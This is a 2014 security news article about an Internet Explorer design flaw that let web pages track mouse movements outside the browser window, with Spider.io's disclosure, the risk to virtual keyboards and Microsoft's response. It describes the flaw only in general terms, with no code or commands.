September 22, 2014

IE lets web pages track mouse movements, bad news for virtual keyboards, great news for unscrupulous ad companies

(LiveHacking.Com) –  Details have emerged about how Microsoft Internet Explorer allows web pages with JavaScript to track the whereabouts of the mouse anywhere on the screen, even outside of the currently viewed web page. The ramifications of this are two fold. First those using virtual keyboard as a way to avoid possible keyloggers can now no longer assume that the virtual keyboard is safe. Secondly it appears that unscrupulous ad companies have been using this flaw for a while to  measure the viewability of display ads.

Spider.io, a web analytics firm, told Microsoft about the flaw in October, but Redmond has done nothing about it. The issues affects all version of Internet Explorer from version 6 to version 10 and only since the finding have been made public has Microsoft commented on the vulnerability. At the moment Microsoft has no plans to patch the flaw.

The team at Spider.io have created a game to illustrate how easy it is to exploit IE and compromise the security of virtual keyboards. The game may be found at iedataleak.spider.io. There is also a demonstration showing how the flaw can be used to track the mouse over the Skype keypad despite the fact that the Internet Explorer window is not active.

According to  Doug de Jager, chief executive of spider.io, the vulnerability is already being exploited by at least two display ad analytics companies across billions of page impressions per month.

“The vulnerability is being exploited rather mischievously by these companies to measure the viewability of display ads – arguably the hot topic in display advertising at the moment,” de Jager told the Guardian. “Almost every US-based user of Internet Explorer will have their mouse cursor tracked via this exploit almost every day they browse the web.”

Microsoft’s lack of action is a little surprising and it is Redmond’s indifference that has caused Spider.io to disclose the details of the flaw. “We are currently investigating this issue, but to date there are no reports of active exploits or customers that have been adversely affected,” Microsoft said in a statement, adding that it would take “appropriate action to protect our customers”.

Details of the vulnerability

Due to a design flaw, Internet Explorer is populating the global Event object with attributes relating to mouse events, even when it shouldn’t. This means that a web page can be created which uses the fireEvent() method to poll for the mouse position anywhere on the screen and at any time. The reason why the flaw allows programs like Skype to be tracked is that the fireEvent() method and the mouse positions are processed even when the page isn’t active or focused.

Share and Enjoy:
  • Print
  • Digg
  • StumbleUpon
  • del.icio.us
  • Facebook
  • Yahoo! Buzz
  • Twitter
  • Google Bookmarks